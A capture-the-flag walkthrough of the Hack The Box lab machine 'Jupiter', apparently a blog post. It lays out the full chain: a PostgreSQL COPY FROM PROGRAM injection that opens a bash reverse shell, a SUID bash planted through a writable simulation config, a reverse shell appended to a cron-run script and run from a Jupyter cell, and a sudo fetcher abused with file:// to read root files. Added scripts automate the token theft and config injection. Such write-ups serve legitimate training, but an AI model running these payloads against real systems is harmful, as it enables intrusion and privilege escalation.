Introduction
In this walkthrough I will go through Jupiter, a medium-rated HTB box 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/Jupiter-1024x775.png)
Recon
NMAP
As usual, there are two open ports: 22 (SSH) and 80 (HTTP).
![](http://techyrick.com/wp-content/uploads/2023/06/image-1024x798.png)
Let’s visit the site 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-1-1024x448.png)
Let's add jupiter.htb to our /etc/hosts file.
Enumeration
I used ffuf and found one subdomain, kiosk; add kiosk.jupiter.htb to /etc/hosts as well.
![](http://techyrick.com/wp-content/uploads/2023/06/image-2.png)
Use Burp to visit kiosk.jupiter.htb and then check the HTTP history 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-3-1024x777.png)
Now send the request that carries the rawSql parameter to Repeater 🙂
Change the rawSql parameter value to the following. The table is created and then used as the COPY target under the same name (cmd_exec), and the inner double quotes are backslash-escaped because the value sits inside a JSON string. Note that COPY ... FROM PROGRAM only works when the database role the kiosk connects with is a PostgreSQL superuser or a member of pg_execute_server_program, which is the case here:

```json
"CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"
```
Now your modified req will look like this 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-4.png)
Note: don't forget to start a nc listener first (nc -lvnp 4444) 🙂
And GG, you get the reverse shell 🙂
Foothold
![](http://techyrick.com/wp-content/uploads/2023/06/image-5-1024x330.png)
We now have a shell as the postgres user.
In /dev/shm there is a network-simulation.yml belonging to juno, and we have write permission on it 🙂
![](http://techyrick.com/wp-content/uploads/2023/06/image-6-1024x209.png)
Let's upgrade to a proper TTY and edit /dev/shm/network-simulation.yml. Something running as juno periodically feeds this file to shadow (the network simulator), which spawns the processes listed in it, so we make the simulated "server" copy bash into /tmp and the "clients" set the SUID bit on that copy:

```yaml
general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'; its only process copies bash to /tmp
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3';
  # they start 2 seconds later, once the copy exists, and make it SUID
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s
```
![](http://techyrick.com/wp-content/uploads/2023/06/image-7-1024x668.png)
Once the job has run again, /tmp/bash exists with the SUID bit set (check with ls -l /tmp/bash); execute /tmp/bash -p to get a shell with an effective uid of juno.
But we cannot read user.txt from this shell because of the uid (the real uid is still postgres, only the effective uid is juno). There is, however, a shadow-simulation.sh script in juno's home directory that the same job runs. Let's add a reverse shell to that script.
![](http://techyrick.com/wp-content/uploads/2023/06/image-9-1024x60.png)
Our updated shadow-simulation.sh will look like this (the reverse shell goes at the end, so the simulation still runs normally first):

```bash
#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
# added: call back to our listener as juno
bash -i >& /dev/tcp/10.<ip>/4444 0>&1
```
After getting the shell as juno we can read user.txt.
![](http://techyrick.com/wp-content/uploads/2023/06/image-8-1024x510.png)
User – Jovian
If you check id, you will see that juno belongs to the science group, which gives access to /opt/solar-flares/.
Run

```bash
grep -rie token /opt/solar-flares/logs/
```

to find the right Jupyter token in the logs; there is one per run, so pick the one from the current date.
![](http://techyrick.com/wp-content/uploads/2023/06/image-10-1024x114.png)
Let's use chisel to forward port 8888 (Jupyter, which is not reachable from outside) back to our box and use this token.
![](http://techyrick.com/wp-content/uploads/2023/06/image-11-1024x579.png)
Now log in with the token from the current date 🙂
After logging in we can execute commands from a cell in flares.ipynb:

```python
# run this in a new cell of flares.ipynb
import os
os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"')
```
![](http://techyrick.com/wp-content/uploads/2023/06/image-12-1024x194.png)
After executing the cell we get a shell as Jovian.
![](http://techyrick.com/wp-content/uploads/2023/06/image-13-1024x571.png)
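The token hunt and port forward above, as an added example (not from the writeup): a function that picks the newest token out of the log lines (optionally restricted to one date, since every restart mints a new token), the chisel commands for both sides, and a check that Jupyter accepts the token before you open the notebook. It assumes the log lines have the jupyter_server shape shown in SAMPLE_LOG (which is constructed), that chisel listens on port 8000 on the attacker box, and that Jupyter's /api/status endpoint answers once the forward is up.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup.
# SAMPLE_LOG is constructed to look like jupyter_server output in /opt/solar-flares/logs/.
SAMPLE_LOG='[I 2023-06-21 09:00:01.120 ServerApp] http://localhost:8888/lab?token=0f1e2d3c4b5a69788796a5b4c3d2e1f0
[W 2023-06-21 09:00:01.121 ServerApp] No web browser found: could not locate runnable browser.
[I 2023-06-22 09:00:05.003 ServerApp] http://localhost:8888/lab?token=a1b2c3d4e5f60718293a4b5c6d7e8f90
[I 2023-06-22 09:00:05.003 ServerApp]  or http://127.0.0.1:8888/lab?token=a1b2c3d4e5f60718293a4b5c6d7e8f90'

# Read log text on stdin; print the token from the newest "token=" line.
# With a YYYY-MM-DD argument only that day's lines count, which is how you get
# the token of the current date instead of a stale one from an earlier run.
latest_token() {   # usage: latest_token [YYYY-MM-DD] < logfile
    local day=$1
    [ -n "$day" ] || day='[0-9]{4}-[0-9]{2}-[0-9]{2}'
    sed -nE "s/^\[[A-Z] ($day [0-9:.]+)[^]]*].*token=([0-9a-f]+).*/\1 \2/p" \
        | sort | tail -n 1 | cut -d' ' -f3
}

# Port forward, typed on each side (attacker first; 8000 is an assumed port):
#   attacker$ chisel server -p 8000 --reverse
#   juno$     ./chisel client 10.10.X.X:8000 R:8888:127.0.0.1:8888
# Jupyter is then reachable at http://127.0.0.1:8888 on the attacker box.

# Ask Jupyter whether the token works; exit status 0 means it is accepted.
verify_token() {   # usage: verify_token <token> [base-url]
    curl -sf -H "Authorization: token $1" "${2:-http://127.0.0.1:8888}/api/status" >/dev/null
}

# On the box:  cat /opt/solar-flares/logs/* | latest_token "$(date +%F)"
if [ "${1:-}" = "demo" ]; then
    printf '%s\n' "$SAMPLE_LOG" | latest_token
fi
```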
Root
Run sudo -l to check whether there is a binary we can run as root.
Jovian can run /usr/local/bin/sattrack as root. We can get some information about this executable with strings, grepping the output to see whether it reads a config file:

```bash
strings /usr/local/bin/sattrack | grep -i config
```
Look for that file on the filesystem and copy it into /tmp:

```bash
find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp
```
Running sattrack as root now shows that it downloads every URL listed in the tlesources section of config.json into a tle directory under the working directory. The URL handler also accepts the file:// scheme, so we can make root "download" root.txt for us.
Open /tmp/config.json, find the tlesources section and replace any of the three URLs with file:///root/root.txt, as shown below:
```json
"tlesources": [
    "file:///root/root.txt",
    "http://celestrak.org/NORAD/elements/n...",
    "http://celestrak.org/NORAD/elements/g..."
],
```
Save the new config.json and simply run sattrack as root. Enjoy the flag!

```bash
sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt
```
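The config edit above done without nano, as an added example (not the writeup's own code): an awk rewrite that replaces only the first URL inside the tlesources array and leaves any URL in other keys alone, plus the root chain wrapped in a function. SAMPLE_CONFIG is constructed; the real config.json has more keys, and the "mapfile" key and the example.invalid URLs are invented here to show that untouched entries survive.

```shell
#!/usr/bin/env bash
# Added example, not code from the original writeup. Points the first tlesources
# entry of a sattrack config.json at a local file so the root-run fetcher copies it
# into /tmp/tle/. SAMPLE_CONFIG and its keys/URLs are constructed for the demo.
SAMPLE_CONFIG='{
    "mapfile": "http://maps.example.invalid/earth.png",
    "tlesources": [
        "http://tle.example.invalid/first.txt",
        "http://tle.example.invalid/second.txt"
    ]
}'

# Replace only the first URL inside the "tlesources" array with file://<path>.
# Reads the config on stdin, writes the edited config to stdout.
inject_file_url() {   # usage: inject_file_url /root/root.txt < config.json
    awk -v url="file://$1" '
        /"tlesources"/           { inarr = 1 }
        inarr && /"http[^"]*"/   { sub(/"http[^"]*"/, "\"" url "\""); inarr = 0 }
        { print }
    '
}

# Count file:// entries in a config (stdin); exactly 1 is what we want.
count_file_urls() {
    grep -c '"file://' || true
}

# The whole chain as root (mirrors the manual steps on the page).
exploit() {
    cp /usr/local/share/sattrack/config.json /tmp/config.json
    cd /tmp
    inject_file_url /root/root.txt < config.json > config.json.new
    mv config.json.new config.json
    [ "$(count_file_urls < config.json)" = "1" ] || { echo "edit failed"; return 1; }
    sudo /usr/local/bin/sattrack
    cat /tmp/tle/root.txt
}

# Only run the real chain when asked:  ./sattrack_read.sh go
if [ "${1:-}" = "go" ]; then
    exploit
fi
```

Any file readable by root works the same way (id_rsa, /etc/shadow); the root cause is a privileged program trusting a user-writable config and a fetcher that honours file://.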
Conclusion
This box is pretty interesting and stressful at the same time; if you have a personal instance then there is no problem 🙂 I would rate this box 5/10.
Have a nice day !
Jay Shri Krishna ❤️❤️